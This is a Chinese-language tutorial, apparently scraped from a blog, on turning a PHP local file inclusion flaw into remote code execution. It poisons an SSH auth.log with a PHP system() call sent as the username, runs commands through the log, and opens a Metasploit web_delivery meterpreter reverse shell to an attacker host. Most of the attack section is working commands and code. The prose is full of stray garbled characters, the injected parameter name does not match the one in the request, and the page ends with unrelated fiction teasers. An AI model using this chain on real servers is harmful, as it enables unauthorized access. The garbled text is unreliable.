RCE與LFI和SSH日志中毒

在本文中,您將了解如何在auth日志文件的幫助下在Web服務(wù)器中進行未經(jīng)授權(quán)的訪問,如果它受到本地文件包含漏洞的影響。要執(zhí)行此攻擊請閱讀我們之前的文章“ 文件包含攻擊初學(xué)者指南(LFI / RFI)”,它將幫助您配置自己的Web服務(wù)器以及更多關(guān)于LFI漏洞肋乍。

目標、攻擊者:Kali Linux
讓我們開始7蟠妗墓造!

創(chuàng)建一個PHP文件,允許用戶通過file參數(shù)包含文件。因此觅闽,使用文件參數(shù)我們可以執(zhí)行包含惡意代碼的文件帝雇,以使未經(jīng)授權(quán)的訪問成為目標PC。

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("index.php");
   }
   ?>

我將以下PHP代碼保存在文本文件中作為 lfi.php 并保存/var/www/html/谱煤。


image.png

因為我們在var/www/html/lfi中添加了一個包含include函數(shù)的php文件摊求,它允許通過它讀取另一個文件的內(nèi)容并導(dǎo)致LFI攻擊禽拔。讓我們通過瀏覽以下URL來讀取密碼文件來演示它:

localhost/lfi/lfi.php?file=/etc/passwd

從給定的圖像中刘离,您可以觀察到上面的URL已經(jīng)轉(zhuǎn)儲了如下所示的結(jié)果。


image.png

在kali Linux中打開終端并 通過SSH服務(wù)連接目標

ssh root@192.168.1.119

從屏幕截圖中您可以看到我與目標系統(tǒng)連接睹栖。


image.png

鍵入以下命令以查看其日志:

tail -f /var/log/auth.log

從下面給出的圖像中硫惕,您可以檢查auth.log文件的生成日志的詳細信息。


image.png

現(xiàn)在我將嘗試通過瀏覽器上的lfi.php打開auth.log日志文件野来,因此給予讀寫權(quán)限

cd /var/log/
chmod 775 auth.log
image.png

現(xiàn)在將auth.log文件包含為文件參數(shù)恼除,并在瀏覽器中提供以下URL。

192.168.1.119/lfi/lfi.php?file=/var/log/auth.log

從給定的圖像中曼氛,您可以看到它還在瀏覽器中顯示創(chuàng)建的auth日志豁辉。


image.png

由于auth.log文件在我們嘗試連接Web服務(wù)器時為每次成功和失敗的登錄嘗試生成日志。現(xiàn)在利用這個功能舀患,我將發(fā)送惡意PHP代碼 作為假用戶徽级,它將作為新日志自動添加到auth.log文件中。

ssh '<?php system($_GET['xss']); ?>'@192.168.1.119
image.png

再次當您檢查其日志時聊浅,您會發(fā)現(xiàn)PHP代碼已添加為新日志餐抢。

鍵入以下命令以查看其日志:

tail -f /var/log/auth.log
image.png

在這里它將轉(zhuǎn)儲auth日志的數(shù)據(jù)以及執(zhí)行通過cmd給出的注釋; 現(xiàn)在將 ifconfig 作為cmd注釋執(zhí)行以驗證網(wǎng)絡(luò)接口并從給定的屏幕截圖中確認其結(jié)果。

192.168.1.119/lfi/lfi.php?file=/var/log/auth.log &c=ifconfig
image.png

如果您在任何Web應(yīng)用程序中發(fā)現(xiàn)此類漏洞低匙,則可以使用metasploit平臺來利用Web服務(wù)器旷痕。

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport  8081
msf exploit (web_delivery)>exploit

復(fù)制 下面窗口中顯示 的 突出顯示的文本


image.png

將上面 復(fù)制的惡意代碼粘貼到 URL中,如給定圖像所示顽冶,并將 其 作為命令執(zhí)行欺抗。


image.png

當上面的代碼執(zhí)行時,您將獲得目標Web服務(wù)器的meterpreter會話1强重。
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末佩迟,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子竿屹,更是在濱河造成了極大的恐慌报强,老刑警劉巖,帶你破解...
    沈念sama閱讀 217,542評論 6 504
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件拱燃,死亡現(xiàn)場離奇詭異秉溉,居然都是意外死亡,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,822評論 3 394
  • 文/潘曉璐 我一進店門召嘶,熙熙樓的掌柜王于貴愁眉苦臉地迎上來父晶,“玉大人,你說我怎么就攤上這事弄跌〖缀龋” “怎么了?”我有些...
    開封第一講書人閱讀 163,912評論 0 354
  • 文/不壞的土叔 我叫張陵铛只,是天一觀的道長埠胖。 經(jīng)常有香客問我,道長淳玩,這世上最難降的妖魔是什么直撤? 我笑而不...
    開封第一講書人閱讀 58,449評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮蜕着,結(jié)果婚禮上谋竖,老公的妹妹穿的比我還像新娘。我一直安慰自己承匣,他們只是感情好蓖乘,可當我...
    茶點故事閱讀 67,500評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著韧骗,像睡著了一般嘉抒。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上宽闲,一...
    開封第一講書人閱讀 51,370評論 1 302
  • 那天众眨,我揣著相機與錄音,去河邊找鬼容诬。 笑死娩梨,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的览徒。 我是一名探鬼主播狈定,決...
    沈念sama閱讀 40,193評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼习蓬!你這毒婦竟也來了纽什?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,074評論 0 276
  • 序言:老撾萬榮一對情侶失蹤躲叼,失蹤者是張志新(化名)和其女友劉穎芦缰,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體枫慷,經(jīng)...
    沈念sama閱讀 45,505評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡让蕾,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,722評論 3 335
  • 正文 我和宋清朗相戀三年浪规,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片探孝。...
    茶點故事閱讀 39,841評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡笋婿,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出顿颅,到底是詐尸還是另有隱情缸濒,我是刑警寧澤,帶...
    沈念sama閱讀 35,569評論 5 345
  • 正文 年R本政府宣布粱腻,位于F島的核電站庇配,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏栖疑。R本人自食惡果不足惜讨永,卻給世界環(huán)境...
    茶點故事閱讀 41,168評論 3 328
  • 文/蒙蒙 一滔驶、第九天 我趴在偏房一處隱蔽的房頂上張望遇革。 院中可真熱鬧,春花似錦揭糕、人聲如沸萝快。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,783評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽揪漩。三九已至,卻和暖如春吏口,著一層夾襖步出監(jiān)牢的瞬間奄容,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,918評論 1 269
  • 我被黑心中介騙來泰國打工产徊, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留昂勒,地道東北人。 一個月前我還...
    沈念sama閱讀 47,962評論 2 370
  • 正文 我出身青樓舟铜,卻偏偏與公主長得像戈盈,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子谆刨,可洞房花燭夜當晚...
    茶點故事閱讀 44,781評論 2 354

推薦閱讀更多精彩內(nèi)容